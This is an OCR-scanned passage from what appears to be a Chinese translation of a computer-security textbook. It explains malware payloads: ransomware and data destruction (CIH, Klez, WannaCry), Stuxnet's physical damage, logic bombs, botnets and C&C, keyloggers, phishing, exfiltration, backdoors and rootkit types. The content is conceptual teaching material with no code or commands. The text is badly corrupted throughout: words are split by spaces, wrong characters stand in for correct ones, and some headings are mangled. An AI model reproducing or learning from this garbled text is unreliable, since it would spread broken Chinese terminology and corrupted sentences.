也 就 是 : 恶意 软件 携带 什么 样 的 载 傈 。 一 些 恶 意 软件 并 不 携带 载荷 或 仅仅 携带 无 任何 功能 的 载 
倚 。 此 种 恶意 软件 无 论 是 故意 地 或 因 意 外 而 被 过 早 地 释放 出 来 ， 其 唯一 的 目的 是 传播 恶意 软件 。 
更 普遍 的 情况 是 ， 恶 意 软 件 携带 有 一 个 或 多 个 可 以 为 攻击 者 实施 某 些 秘密 行为 的 有 效 载荷 。 

一 种 可 见于 许多 病毒 和 蠕虫 中 的 早期 有 效 载荷 可 以 在 特定 的 触发 条 件 被 满足 时 对 被 感染 
系统 的 数据 造成 破坏 [WEAV03]。 与 此 相关 的 一 种 载荷 在 触发 时 会 在 用 户 的 系统 中 显示 一 些 
并 非 是 用 户主 动 想 要 获取 的 消息 或 内 容 。 而 另 一 个 更 加 恶劣 的 载荷 变种 则 试图 对 系统 造成 实 
际 的 损害 。 所 有 这 些 行为 针对 的 是 计算 机 系统 人 硬件 或 软件 又 或 者 是 用 户 数据 的 完整 性 。 这 些 
行为 可 能 不 会 立刻 就 显现 出 来 ， 而 是 仅仅 在 满足 特定 的 触发 条 件 并 触发 恶意 软件 中 的 逻辑 炸 
弹 代码 时 才 显 现 。 


6.6.1 数据 损坏 和 勒索 软件 
CIH (Chernobyl) 病毒 是 一 个 早期 的 例子 ， 首 次 发 现 于 1998 年 ， 它 是 一 个 有 破坏 性 的 、 
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寄生 性 的 、 内 存 驻 留 性 质 的 病毒 ， 运 行 于 Windows 95 和 98 系统 上 。 它 会 在 可 执行 文件 被 打 
开 时 感染 它们 。 当 触发 日 期 一 到 ， 它 会 用 0 覆盖 硬盘 的 第 一 个 兆 字 节 的 数据 以 删除 被 感染 系统 
中 的 数据 ， 导 致 整个 文件 系统 的 大 面积 损坏 。 该 病毒 首次 发 作 于 1999 年 4 月 26 日 ， 据 估计 有 
100 万 以 上 的 计算 机 被 感染 。 

与 之 类 似 ， 求职 信 (Klez) 蠕虫 是 早期 的 一 个 损害 型 蠕虫 的 例子 ， 它 感染 从 Windows 95 
到 Windows XP 的 一 系列 操作 系统 ， 首 次 发 现 于 2001 年 10 月 。 求 职 信 上 蠕虫 通 过 电子 邮件 ， 癌 
用 户 地 址 簿 中 的 邮箱 地 址 和 系统 中 的 文件 传播 自身 的 拷贝 。 它 可 以 暂停 和 删除 一 些 运行 在 系统 
中 的 反 病毒 程序 。 在 发 作 日 期 ， 即 每 年 某 几 个 月 的 13 号 ， 它 会 清空 本 地 人 硬盘 下 的 文件 。 

除了 单纯 地 破坏 数据 ， 某 些 恶 意 软 件 会 加 密 用 户 数 据 ， 然 后 癌 用 户 案 要 赎金 才 可 以 恢复 数 
据 。 这 种 恶意 软件 有 时 被 称 为 勒索 软件 (ransomware)。1989 年 发 现 的 Cyborg 木马 就 是 早期 的 
例子 。 但 是 ， 到 了 2006 年 年 中 ， 涌 现 出 一 批 使 用 公 钥 加 密 算 法 和 越 来 越 长 的 密 钥 对 数据 进行 
加 密 的 蠕虫 和 木马 (如 Gpcode 木马 )。 用 户 必须 支付 赎金 ， 或 在 指定 网 站 进行 支付 才 可 以 拿 到 
解密 的 密 钥 。 虽 然 早 期 使 用 弱 加 密 技 术 的 勒索 软件 有 可 能 不 支付 赎金 便 能 破解 ， 但 是 同样 的 方 
法 对 于 近期 使 用 长 密 钥 公 钥 加 密 算 法 的 勒索 软件 便 无 能 为 力 了 。 文 献 [SYMA16, VERI16] 指出 
勒索 软件 是 一 个 越 来 越 大 的 挑战 ， 是 安装 在 系统 上 的 最 常见 类 型 的 恶意 软件 之 一 ， 并 且 通 常 通 
过 “路 过 式 下 载 ” 或 垃圾 邮件 传播 。 

上 述 在 讨论 蠕虫 部 分 提 到 的 WannaCry 勒索 软件 , 在 2017 年 5 月 感染 了 许多 国家 的 很 多 
系统 。 当 其 被 安装 在 被 感染 的 系统 上 ， 它 会 加 密 大 量 满 足 列表 中 文件 类 型 要 求 的 文件 ， 而 后 索 
要 比特 币 赎 金 来 恢 复 它 们 。 一 旦 这 种 情况 发 生 ， 信 息 的 恢复 只 能 依赖 于 组 织 有 良好 的 备份 、 应 
急 响 应 措施 、 灾 难 恢复 计划 。 这 一 部 分 我 们 将 在 第 17 章 进 行 讨论 。WannaCry 赎金 攻击 引起 了 妈 
体 的 极 大 关注 ， 部 分 原因 是 受 影 响 的 组 织 数量 众多 ， 以 及 它们 从 赎金 攻击 中 恢复 过 来 所 付出 的 
代价 巨大 。 这 些 攻击 的 目标 已 经 超出 个 人 计算 机 系统 ， 包 括 移动 设备 和 Linux 服务 器 。 而 威胁 公 
布 敏 感 个 人 信息 或 在 短 时 间 内 永久 销毁 加 密 密 钥 等 策略 有 时 被 用 来 增加 受害 者 付费 的 压力 。 


6.6.2 ”物理 损害 


损坏 系统 类 有 效 载 集 的 进一步 变种 的 目标 是 引起 物理 设备 的 损害 (real-world damage). *% 
感染 的 系统 显然 是 最 容易 受害 的 目标 设备 。 刚 才 提 到 的 Chernobyl 病毒 不 仅 毁 坏 数 据 ， 还 会 试 
图 重 写 用 于 引导 计算 机 启动 的 BIOS 代码 。 如 果 成 功 ， 引 导 过 程 则 会 失效 ， 系 统 无 法 使 用 ， 除 
非 重新 写 人 BIOS 代码 或 更 换 BIOS 心 片 。 

最 近 ， 我 们 先前 讨论 的 震 网 (Stuxnet) 蠕虫 的 有 效 载 和 荷 以 一 些 特 殊 工 业 控制 系统 为 目标 
[CHEN11，KUSH13]。 如 果 一 个 使 用 特定 的 西门 子 〈Siemens) 工业 控制 软件 并 处 于 特定 设置 
下 的 控制 系统 被 感染 ， 蠕 虫 会 蔡 换 系统 中 原始 的 控制 代码 ， 令 控制 设备 偏离 其 正常 的 运行 范 
围 ， 导 致 该 系统 控制 的 设备 停止 运转 。 伊 朗 铀 浓缩 项 目 使 用 的 离心 机 被 高 度 怀 疑 是 震 网 蠕虫 的 
目标 ， 因 为 在 该 蠕虫 活动 的 时 候 ， 这 一 设备 的 故障 率 远 高 于 正常 水 平 。 如 我 们 先前 讨论 所 指出 
的 ， 震 网 蠕虫 提高 了 对 使 用 复杂 和 有 针对 性 的 恶意 软件 产生 的 工业 设备 破坏 问题 的 关注 。 

2015 年 英国 政府 的 安全 和 防御 评估 报告 指出 ， 他 们 越 来 越 担 心 国家 支持 的 机 构 ( state- 
sponsored) 和 非 国 家 行为 者 对 重要 基础 设施 使 用 网 络 攻 击 。2015 年 12 月 乌克兰 电力 系统 遭 到 
破坏 的 袭击 事件 表明 ， 这 些 担忧 是 有 根据 的 ， 因 为 许多 关键 基础 设施 的 牢固 程度 不 足以 抵御 这 
种 攻击 [SYMA16]。 


6.6.3 ”逻辑 炸弹 
数据 损坏 型 恶意 软件 一 个 重要 的 组 成 部 分 是 逻辑 炸弹 。 逻 辑 炸 弹 是 向 入 在 恶意 软件 中 的 代 
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码 ， 在 特定 条 件 满足 时 便 会 “爆炸 ”。 能 够 引爆 逻辑 炸弹 的 条 件 很 多 ， 例 如 某 个 特定 的 文件 存 
在 与 否 、 某 个 特定 的 日 期 或 星期 几 、 某 些 软件 的 特定 版 本 或 配置 、 运 行程 序 的 某 个 特定 用 户 等 
可 以 被 当 作 逻辑 炸弹 的 触发 需 。 逻 辑 炸 弹 一 旦 被 引爆 ， 它 会 修改 或 删除 数据 或 所 有 文件 ， 导 致 
宕 机 或 者 其 他 破坏 。 

有 关 逻 辑 炸弹 的 一 个 又 动 性 事件 是 Tim Lloyd 案例 。Tim Lloyd 的 逻辑 炸弹 使 他 所 在 的 
Omega Engineering 公司 蒙受 了 1000 多 万 美元 的 损失 ， 打 乱 了 公司 制定 的 发 展 战略 ， 而 且 还 导 
XS 80 名 工人 失业 [GAUD00]。Tim Lloyd 也 因此 被 判处 41 个 月 监禁 ， 并 责令 他 支付 200 万 
美元 的 赔偿 金 。 


6.7 载荷 - 攻击 代理 - zombie, bot 


我 们 讨论 的 下 一 类 有 效 载荷 可 以 使 得 攻击 者 能 够 暗中 使 用 受 感 染 的 系统 的 计算 资源 和 网 
络 资源 。 此 种 被 感染 的 系统 被 称 为 僵尸 机 (在 英文 中 它们 有 bot, robot, zombie, drone 等 多 种 
称谓 )， 它 会 秘密 地 控制 一 台 连 接 Internet 的 计算 机 ， 并 利用 所 控制 的 计算 机 发 动 攻击 ， 这 样 
使 追踪 僵尸 机 变 得 很 困难 。 僵 尸 机 经 常 被 “种 植 ” 在 属于 可 信 的 第 三 方 的 成 目 上 千 台 计算 机 
上 。 受 损 系 统 不 仅仅 是 个 人 计算 机 ， 还 包括 服务 器 ， 以 及 最 近 的 磐 人 式 设 备 ， 如 路 由 需 或 监控 
摄像 机 。 大 量 的 僵尸 机 能 够 以 一 种 协调 的 方式 行动 ; 这 样 的 一 大 群 僵尸 机 就 组 成 了 僵尸 网 络 
(botnet)。 这 一 类 型 的 有 效 载 集 所 攻击 的 是 被 感染 系统 的 完整 性 和 可 用 性 。 


6.7.1 bot 的 用 途 


文献 [HONE05] 列 出 了 bot 的 如 下 用 途 : 

e 分 布 式 拒绝 服务 攻击 (DDoS): DDoS 攻击 是 一 种 通过 攻击 一 个 计算 机 或 者 网 络 而 使 用 
户 不 能 获得 正常 服务 的 攻击 。 我 们 在 第 7 章 中 分 析 DDoS 攻击 。 

e 发送 垃 圾 邮件 (spamming): 通过 控制 僵尸 网 络 和 其 中 大 量 的 bot， 攻 击 者 可 以 发 送 大 
量 的 垃圾 邮件 。 

。 嗅 探 通信 流量 (sniffing traffic): bot 可 以 使 用 数据 包 串 探 工 具 来 查看 经 过 受 探 主机 的 数据 
包 ， 寻 找 那些 感 兴趣 的 明文 数据 。 嗅 探 经 党 被 用 来 获取 用 户 名 和 口令 这 样 的 敏感 数据 。 

© 记录 键盘 (keylogging): 如 果 受 控 主 机 使 用 了 加 密 的 通信 信道 (如 HTTPS 或 POP3S )， 
那么 单纯 地 嗅 探 网 络 数 据 包 是 无 价值 的 ， 因 为 攻击 者 无 法 获得 对 应 的 解密 数据 包 的 密 
钥 。 但 是 通过 使 用 键盘 记录 器 来 捕获 受 控 主 机 上 的 键盘 输入 ， 攻 击 者 还 是 能 够 获得 敏 
感 的 数据 的 。 

e 传播 新 的 恶意 软件 ( spreading new malware): 僵尸 网 络 还 可 以 用 来 传播 新 的 bot。 这 是 

非常 简单 的 ， 因 为 所 有 bot 都 实现 了 通过 HTTP 或 FTP 下 载 并 执行 一 个 文件 的 机 制 。 

一 个 拥有 一 万 台 主 机 的 僵尸 网 络 可 以 作为 蠕虫 或 者 电子 邮件 病毒 的 开始 基点 ， 从 而 使 

它们 得 以 迅速 地 传播 ， 进 而 导致 更 大 的 破坏 。 

安装 广告 插件 和 浏览 器 辅助 插件 installing advertisement add-ons and Browser Helper 

Objects (BHO)): 僵尸 网 络 也 能 够 用 来 获得 经 济 利益 。 这 是 通过 先 建 立 一 个 带 有 一 些 

广告 的 虚假 网 站 ， 网 站 的 管理 者 和 那些 能 够 为 广告 点 击 付 费 的 公司 达成 交易 。 利 用 伪 

尸 网 络 ， 并 且 使 点 击 操作 可 以 自动 执行 ， 那 么 就 可 以 使 这 些 广告 迅速 有 成 千 上 万 的 点 

击 量 。 更 进一步 的 发 展 是 让 bot 劫持 受 控 主 机 的 起 始 页 ， 这 样 每 当 该 主机 的 用 户 打 开 

浏览 硕 时 都 会 目 动 点 击 广告 。 

攻击 IRC 聊天 网 络 (attacking IRC chat network): 僵尸 网 络 也 可 以 用 来 攻击 Internet 中 

继 聊 天 (Internet Relay Chat, IRC) 网 络 。 克 隆 攻击 是 比较 流行 的 攻击 。 在 这 种 攻击 中 ， 
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攻击 者 命令 每 一 个 bot 将 其 大 量 的 克隆 体 连 接 到 目标 IRC 网 络 。 受 害 网 络 会 被 来 目 成 
千 上 万 的 bot 或 者 成 千 上 万 的 克隆 bot 的 加 入 通道 的 服务 请 求 所 淹没 。 这 样 受害 的 IRC 
网 络 就 瘫 病 了 ， 这 很 类 似 于 分 布 式 拒绝 服务 攻击 。 

e 操纵 在 线 投 票 或 游戏 manipulating online polls/game) : 在 线 投票 和 游戏 越 来 越 受 到 关 
注 ， 而 且 用 僵尸 网 络 操纵 它们 也 是 很 容易 的 。 因 为 每 一 个 bot 都 有 一 个 不 同 的 卫 地 址 ， 
因此 每 一 票 都 和 真实 用 户 的 投票 有 相同 的 可 信和 度 。 在 线 游戏 可 以 用 相似 的 方法 操纵 。 


6.7.2 远程 控制 功能 


是 否 具 有 远程 控制 功能 是 bot 与 蠕虫 的 区 别 所 在 。 蠕 虫 是 目 我 复制 并 自我 激活 ， 而 bot 是 
由 某 种 形式 的 指挥 控制 (Command and Control, C&C) 服务 器 网 络 控制 的 。 这 种 控制 通信 不 需 
要 是 持续 性 的 ， 而 可 以 在 僵尸 机 发 现 自己 被 接 入 网 络 时 周期 性 地 建立 。 

早期 实现 远程 控制 的 工具 是 IRC 服务 器 。 所 有 的 bot 都 会 加 入 这 个 服务 需 的 一 个 特定 通道 
中 ， 并 把 通道 中 收 到 的 消息 当 作 命令 处 理 。 近 来 越 来 越 多 的 僵尸 网 络 已 经 避免 使 用 IRC 机 制 
了 ， 转 而 利用 协议 (如 HTTP 协议 ) 来 实现 隐蔽 通信 通道 。 利 用 点 对 点 通信 协议 的 分 布 式 控制 
机 制 也 是 一 种 可 用 的 控制 方法 ， 以 避免 单一 控制 节点 容易 失效 的 不 足 。 

最 初 ， 这 些 C&C 服务 器 使 用 固定 IP 地 址 ， 故 其 很 容易 被 定位 并 被 执法 机 构 接管 或 揭 毁 。 
近期 的 恶意 软件 家 族 则 用 上 了 一 些 新 技术 ， 如 自动 生成 大 量 服务 器 域名 并 令 恶 意 软 件 和 尝试 与 所 
有 这 些 域 名 进行 连接 。 如 此 ， 一 旦 其 中 一 个 服务 器 名 称 被 破坏 ， 攻 击 者 可 以 利用 这 些 一 定 会 被 
尝试 的 域名 中 的 某 一 个 来 重新 建立 服务 器 。 对 抗 这 一 技术 需要 借助 逆 疝 工程 以 分 析 其 域名 生成 
算法 ， 然 后 试图 获得 对 所 有 这 些 (而 数量 显然 是 极 大 的 ) 域名 的 控制 。 另 一 种 隐藏 服务 器 的 技 
术 是 快速 变迁 域名 ( fast-flux DNS) 技术 一 一 令 与 给 定 服务 器 域名 相关 联 的 IP 地 址 频繁 地 变动 
(通常 每 隔 几 分钟 变 动 一 次 )， 并 在 大 量 服务 器 代理 中 轮转 ， 而 这 些 代理 往往 是 僵尸 网 络 的 其 他 
成 员 。 这 些 措施 都 会 阻止 执法 机 构 有 效 地 应 对 僵尸 网 络 所 珊 来 的 威胁 。 

当 控制 模块 和 bot 的 通信 通道 建立 后 ， 控 制 模块 就 可 以 操纵 bot 了。 最 简单 的 方式 就 是 ， 
控制 模块 可 以 轻松 地 向 bot 发 送 命 令 ， 让 bot 去 执行 一 个 已 经 在 bot 上 设 定好 的 例 程 。 更 灵活 
的 方式 是 ， 控 制 模块 向 bot 发 送 更 新 命令 ， 命 令 它们 从 某 个 Internet 地 址 上 下 载 一 个 程序 ， 然 
后 执行 这 个 程序 。 后 一 种 方法 使 bot 变 成 一 种 能 够 实现 多 种 攻击 的 更 通用 的 工具 。 这 种 控制 模 
块 也 可 以 收集 bot 的 信息 ， 攻 击 者 可 以 在 随后 进行 攻击 。 针 对 僵尸 网 络 的 一 个 有 效 对 策 是 接管 
或 关闭 其 C & C 网 络 。 一 些 国家 执法 机 构 之 间 加 强 合作 与 协调 ， 导 致 近年 来 越 来 越 多 的 C & C 
被 成 功 缉 获 [SYMA16]， 并 因此 遏制 了 7 其 相关 的 僵尸 网 络 。 这 些 行动 还 导致 一 些 与 其 有 关 的 人 
受到 刑事 指控 。 


6.8 载荷 - 信息 窃取 - 键盘 记录 器 、 网 络 钓鱼 、 间 谍 软 件 


现在 讨论 用 于 收集 存储 在 被 感染 系统 中 的 数据 的 载 知 。 此 类 载荷 的 一 个 共同 目的 是 获得 用 
户 在 银行 、 游 戏 或 其 他 相关 网 站 的 登录 名 和 口令 ， 由 此 使 得 攻击 者 可 以 利用 上 述 信息 模拟 正常 
用 户 来 获得 这 些 网 站 的 登 和 人 权限。 它们 有 时 也 可 能 以 文档 或 系统 的 配置 细节 作为 目标 ， 达 到 侦 
听 和 间谍 的 目的 (尽管 这 相对 不 那么 常见 )。 此 类 载荷 所 针对 的 是 目标 信息 的 机 密 性 。 


6.8.1 凭证 盗窃 、 键 盘 记 录 器 和 间谍 软件 


一 般 ， 用 户 通过 加 密 信道 (如 HTTP 或 POP3S) 向 银行 、 游 戏 或 相关 网 站 发 送 他 们 的 登录 
名 和 口令 和 凭证， 以 保护 这 些 信息 不 被 侦 听 网 络 数据 包 截 获 。 为 了 绕 过 这 个 防护 ， 攻 击 者 可 以 安 
装 一 个 键盘 记录 器 (keylogger) 以 抓 取 被 感染 机 需 中 的 键 击 信息 ， 从 而 攻击 者 可 以 监视 那些 敏感 
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言 息 。 由 于 键盘 记录 需 会 抓 取 被 感染 机 器 上 所 有 文本 输入 的 拷贝 ， 它 们 一 般 都 会 设置 一 些 过 滤 
机 制 以 便 只 记录 与 攻击 者 想 要 的 关键 字 相 近 的 信息 (如 “登录 名 ”口令 ”或 “paypal.com”)。 

为 了 应 对 键盘 记录 需 ， 一 些 银行 或 其 他 网 站 转 而 使 用 一 个 图 形 化 的 小 程序 来 输入 关键 
信息 ， 诸 如 口令 。 因 为 图 形 化 的 小 程序 不 使 用 键盘 输入 文本 ， 所 以 传统 的 键盘 记录 上 需 不 能 
获取 此 类 信息 。 为 了 对 付 这 个 保护 方法 ， 攻击 者 开发 了 更 加 通用 的 间谍 软件 用 以 监听 受害 
系统 中 更 多 种 类 的 活动 。 这 可 能 包括 监视 历史 记录 和 浏览 内 容 ， 更 改革 一 网 页 至 攻击 者 控 
制 的 虚假 网 站 ， 动 态 修改 浏览 器 和 网 站 的 交换 数据 。 所 有 这 些 会 导致 用 户 私 人 信息 遭 到 严 
重 的 侵害 。 

由 犯罪 软件 工具 包 制 作 的 Zeus 网 银 木 马 是 此 类 间谍 软件 中 一 个 杰出 的 代表 ， 在 近年 来 被 
广泛 地 部 署 [BINS10]。 它 利用 键盘 记录 器 盗 取 银 行 和 金融 赁 证， 可 能 修改 某 些 网 站 的 表单 数 
据 。 它 通常 利用 垃圾 电子 邮件 或 通过 一 个 含有 路 过 式 下 载 的 有 害 网 站 进行 部 署 。 


6.8.2 网络 钓鱼 和 身份 盗窃 


另 一 种 用 于 获取 用 户 登 录 名 和 口令 凭证 的 方法 是 在 垃圾 邮件 中 包含 指向 被 攻击 者 控制 的 虚 
假 网 站 URL， 并 让 这 个 虚假 网 站 模仿 一 些 银行 、 游 戏 或 其 他 类 似 网 站 的 登录 界面 。 此 类 邮件 
通常 包含 有 提示 用 户 需 要 紧急 验证 他 们 的 账户 以 免 被 锁定 的 消息 。 如 果 用 户 不 加 小 心 ， 没 有 发 
现 自己 正 受 到 诈骗 ， 跟 随 链接 并 提供 了 需要 的 细节 信息 ， 就 无 疑 会 导致 攻击 者 利用 截获 的 凭证 
信息 攻陷 用 户 的 账户 。 

更 普遍 的 是 ， 利 用 此 类 垃圾 邮件 引导 用 户 至 攻击 者 的 虚假 网 站 ， 或 让 用 户 填 写 随 信 附 上 
的 某 些 表格 并 回复 给 攻击 者 ， 以 便 收 集 用户 的 个 人 隐私 信息 。 得 到 了 足够 的 信息 ， 攻 击 者 可 以 
“猜测 ”用 户 的 身份 ， 从 而 获得 信用 信息 或 其 他 资源 的 访问 权限 。 这 被 称 作 钓鱼 攻击 一 一 利用 
社会 工程 学 ， 伪 装 成 可 信 来 源 的 通信 取得 用 户 的 信任 [GOLD10]。 

用 于 钓鱼 攻击 的 垃圾 电子 邮件 经 常 通过 僵尸 网 络 被 广泛 地 分 发 至 大 量 的 用 户 。 虽 然 邮 件 内 
容 与 一 大 部 分 收 件 人 的 可 信 来 源 是 不 匹配 的 ， 但 是 对 攻击 者 而 言 ， 只 要 这 些 邮 件 分 发 至 足够 多 
用 户 ， 而 其 中 有 一 部 分 用 户 最 终 上 当 ， 他 们 就 有 利 可 图 。 

一 个 更 为 危险 的 变种 是 鱼 叉 式 网 络 钓鱼 (spear-phishing)。 它 同样 是 一 封 声 称 来 自 可 信 来 
源 的 电子 邮件 ， 但 包含 伪装 成 假发 票 ， 办 公文 档 或 其 他 预期 内 容 的 恶意 附件 。 不 同 的 是 ， 邮 件 
的 收 件 人 事先 已 经 受到 了 攻击 者 的 认真 研究 ， 因 为 每 封 邮件 都 是 精心 制作 的 以 迎合 相应 的 收 件 
人 (通常 是 通过 引用 一 系列 信息 以 说 服 收 件 人 相信 邮件 的 可 靠 性 )。 这 大 大 增加 了 收 件 人 像 攻 
击 者 所 期 望 的 那样 做 出 响应 的 可 能 性 。 这 种 类 型 的 攻击 (来自 资源 丰富 的 组 织 ) 特别 用 于 工业 
和 其 他 形式 的 间谍 活动 ， 或 财务 欺诈 ， 如 虚假 电汇 授权 。 无 论 是 由 于 网 络 钓鱼 ， 还 是 驱动 下 载 
或 直接 黑客 攻击 ， 事 件数 量 和 暴露 的 个 人 记录 数量 都 在 持续 增长 。 例 如 ，2015 年 1 H Anthem 
医疗 数据 泄露 暴露 了 超过 7800 万 个 可 能 用 于 身份 盗用 的 个 人 信息 记录 。 人 们 认为 资源 充足 的 
Black Vine 网 络 间 谍 组 织 应 该 对 这 次 袭击 负责 [SYMA16]。 


6.8.3 侦察、 间谍 和 数据 渗 漏 


凭据 盗 穷 和 喘 份 盗 盘 是 侦察 型 载荷 中 的 特殊 例子 ， 其 目的 是 获得 想 要 的 信息 并 反馈 给 攻 
击 者 。 这 些 特殊 的 例子 当然 是 更 加 常见 的 ， 但 是 也 有 其 他 类 型 的 攻击 目标 为 人 所 知 。2009 年 
的 极光 行动 ( Operation Aurora) 利用 木马 获取 权限 ， 并 有 可 能 修改 了 一 些 高 科技 公司 、 安 全 公 
司 和 防务 承包 商 的 源 代码 库 [SYMA16]。2010 年 发 现 的 震 网 蠕虫 通过 获取 硬件 和 软件 的 配置 
细节 以 确定 其 是 否 已 人 侵 了 特定 的 目标 系统 。 震 网 的 一 些 早 期 版 本 会 将 其 所 获取 的 这 些 配 置信 
息 反 馈 给 攻击 者 ， 从 而 使 这 些 信息 可 以 被 用 来 开发 其 后 续 版 本 中 要 部 署 的 具体 攻击 [CHEN11， 
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KUSH13]。 还 有 其 他 一 些 大 规模 记录 上 曝光 的 知名 度 高 的 例子 。 其 中 包括 2010 年 切尔西 & 
的 敏感 军事 和 外 交 文 件 的 泄露 以 及 爱德华 斯 诺 登 在 2013 年 发 布 的 有 关 国 家 安全 局 监视 计划 
的 信息 。 这 些 都 是 内 部 人 士 出 于 意识 形态 原因 利用 其 合法 访问 权 发 布 信息 的 例子 ， 并 且 都 导致 
了 对 这 些 行动 的 后 果 的 重要 全 球 讨论 和 辩论 。 与 之 相反 ，2015 年 阿 什 利 . 麦迪 了 还 成 人 网 站 用 
户 泄露 的 个 人 信息 ， 以 及 2016 年 巴拿马 文件 (Panama Papers) 泄露 了 有 关 数 百 万 份 外 国 免 税 
单位 在 某 些 情况 下 避税 的 文件 ， 都 被 认为 是 外 部 黑客 攻击 不 安全 的 系统 。 这 两 起 事件 都 给 这 些 
泄密 事件 中 的 相关 人 士 造成 了 严重 影响 。 

高 级 持续 性 威胁 攻击 可 能 导致 大 量 敏感 数据 的 丢失 ， 这 些 丢 失 的 数据 会 被 发 送 (或 者 说 泄 
露 ) 至 攻击 者 处 。 检 测 和 防止 此 类 数据 泄露 需要 合适 的 技术 性 “数据 丢失 ”应 对 方法 ， 要 么 对 
数据 的 访问 权限 实施 管理 ， 要 么 对 越过 所 有 者 网 络 边界 数据 传输 进行 控制 。 


6.9 载荷 - 隐蔽- Fal], rootkit 


我 们 讨论 的 最 后 一 类 载荷 是 恶意 软件 用 来 隐蔽 其 在 被 感染 系统 中 的 存在 和 提供 侵 和 人 系统 权 
限 的 技术 。 这 类 载 集 同样 也 攻击 系统 的 完整 性 。 


6.9.1 i] 


后 门 (backdoor) 也 被 称 为 陷 门 ( trapdoor)， 它 是 进入 一 个 程序 的 秘密 入 口 ， 使 得 知情 者 
不 经 过 通常 的 安全 访问 程序 而 获取 访问 权限 。 多 年 来 ， 后门 一 直 被 程序 员 合 理 地 用 于 程序 的 调 
试 和 测试 。 这 样 的 后 门 被 称 为 维护 挂钩 (maintenance hook)。 当 程序 员 开 发 具有 身份 认证 或 者 
很 长 的 配置 过 程 的 应 用 程序 而 需要 用 户 输入 许多 不 同 值 时 ， 往 往 会 用 到 后 门 。 因 为 在 调试 这 些 
程序 时 ， 开 发 人 员 和 希望 获得 一 些 特权 或 者 避免 所有 必要 的 配置 和 认证 过 程 。 程 序 设计 者 设置 后 
门 的 另 一 个 目的 是 ， 确 保 当 内 人 到 应 用 程序 中 的 认证 机 制 发 生 错误 时 ， 还 有 其 他 激活 程序 的 方 
法 。 后 门 是 能 够 识别 一 些 特殊 的 输入 序列 或 者 当 被 某 个 用 户 ID 运行 或 某 个 不 可 能 的 事件 序列 
发 生 所 触发 的 代码 。 

当 程 序 员 肆 无 忌 习 地 使 用 后 门 获得 非 授 权 访 问 时 ， 后 门 就 变 成 了 一 种 安全 威胁 。 在 电影 
《 War Games 》 中 描述 的 漏洞 的 基本 思想 来 自 于 后 门 。 另 一 个 例子 是 ,在 Multics 系统 的 开发 过 
程 中 ， 美国 空军 “老虎 队 ”( 模 拟 攻 击 者 ) 负责 对 该 系统 进行 渗透 测试 。 渗 透 所 用 的 策略 之 一 就 
是 同一 个 运行 Multics 系统 的 站 点 发 送 伪造 的 操作 系统 升级 程序 ， 升 级 程序 包含 一 个 能 够 通过 
后 门 激活 的 特洛伊 木马 程序 ， 通 过 这 个 木马 程序 ， 老 虎 队 能 够 获得 Multics 系统 的 访问 权限 。 
这 个 威胁 设计 得 非常 巧妙 以 至 于 Multics 的 开发 人 员 在 被 告知 这 种 威胁 真实 存在 后 ， 都 没 法 找 
到 它 [ENGE80]。 

近期 ， 后 门 通 常 当 作 网 络 服务 监听 在 一 些 攻击 者 能 够 连接 的 非 标 准 端 口上 实现 ， 通 过 运 
行 后门 向 受害 系统 发 送 命 令 。 我 们 在 本 章 前 面 描述 的 WannaCry 勒索 软件 中 包含 了 这 样 的 后 门 
程序 。 

由 于 很 难 通 过 操作 系统 对 后 门 进 行 控 制 。 因 此 针对 后 门 的 安全 措施 必须 重点 关注 程序 的 开 
发 过 程 和 软件 的 更 新 活动 以 及 希望 提供 网 络 服务 的 程序 。 


6.9.2 rootkit 


rootkit 是 安装 在 系统 中 用 来 支持 以 管理 员 (或 root) 权限 9 对 系统 进行 访问 的 一 组 程序 。 
有 了 管理 员 的 权限 就 可 以 使 用 操作 系统 的 所 有 功能 和 服务 。rootkit 以 恶意 且 隐 蔽 的 方式 更 改 主 


日 ”在 UNIX 系统 上 ,管理 员 或 者 超级 用 户 账号 被 称 为 root， 因 此 管理 员 权 限 ， 也 称 为 root 权限 。 
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机 的 标准 功能 。 获 得 管理 员 权 限 后 ， 黑 客 就 完全 控制 了 该 系统 ， 并 能 够 添加 或 修改 程序 和 文 
件 ， 监 控 当 前 进程 ， 发 送 和 接收 网 络 通信 ， 并 且 如 果 需 要 的 话 还 可 以 设置 后 门 。 

rootkit 能 够 对 系统 进行 很 多 的 修改 来 隐藏 目 己 ， 使 用 户 很 难 察觉 到 rootkit 的 存在 ， 也 很 
难 确定 它 对 系统 进行 了 哪些 修改 。 其 实 ，rootkit 是 通过 破坏 系统 对 进程 、 文 件 、 注 册 表 的 监控 
和 报告 机 制 而 实现 隐藏 的 。 

rootkit 可 以 以 如 下 特征 进行 分 类 : 


持续 的 ( persistent) : 系统 每 一 次 启动 都 会 被 激活 。rootkit 必须 把 它 的 代码 存储 在 持续 


性 存储 如 注册 表 或 文件 系统 中 ， 并 配置 一 种 方式 使 它 不 需要 用 户 干预 就 可 以 自己 执行 


这 意味 着 更 容易 检测 ， 因 为 持久 存储 中 的 副本 可 能 会 被 扫描 。 

基于 内 存 的 ( memory based): 没有 持续 性 ， 重 启 后 rootkit 就 会 失效 。 但 由 于 它 只 存在 
于 内 存 中 ， 所 以 很 难 发 现 。 

FAR Ast (user mode): 截获 API (应 用 程序 编程 接口 ) 调用 ， 并 修改 返回 值 。 例 如 ， 
当 一 个 应 用 程序 执行 列 出 目录 中 文件 的 操作 时 ， 使 得 返回 结果 中 不 包括 与 rootkit 相关 
的 文件 。 

内 核 模式 (kernel mode); 能 够 截获 对 本 地 内 核 模 式 S 的 API 调用 。rootkit 还 能 够 通过 
删除 内 核 的 活动 进程 列表 中 的 恶意 软件 进程 来 隐藏 目 己 。 

基于 虚拟 机 的 〈virtual machine based): 此 类 rootkit 会 首先 安装 一 个 轻 量 级 虚拟 机 监视 
器 ， 然 后 在 监视 项 之 上 的 虚拟 机 中 运行 操作 系统 。 这 样 一 来 ，rootkit 就 能 够 对 已 经 虚 
拟 化 的 系统 中 所 发 生 的 状态 和 事件 进行 透明 地 截获 和 修改 。 

外 部 模式 (external mode): 将 恶意 软件 植 人 目标 系统 的 正和 运行 模式 之 外 ， 如 机 需 的 
BIOS 中 或 系统 管理 模式 中 等 ， 这 样 它 就 可 以 直接 获得 硬件 的 访问 权限 。 


这 个 分 类 展示 了 一 个 持续 性 的 军备 竞赛 ; 一 方 是 rootkit 作者 ， 他 们 利用 更 加 隐蔽 的 机 制 
来 隐藏 他 们 的 代码 ; 男 一 方 则 是 那些 开发 系统 加 固 机 制 以 对 抗 rootkit 的 破坏 ， 或 者 在 其 发 生 
时 予以 检测 的 开发 者 们 。 许 多 这 样 的 进展 是 寻找 更 加 “底层 ”形式 的 攻击 。 早 期 的 rootkit 工 
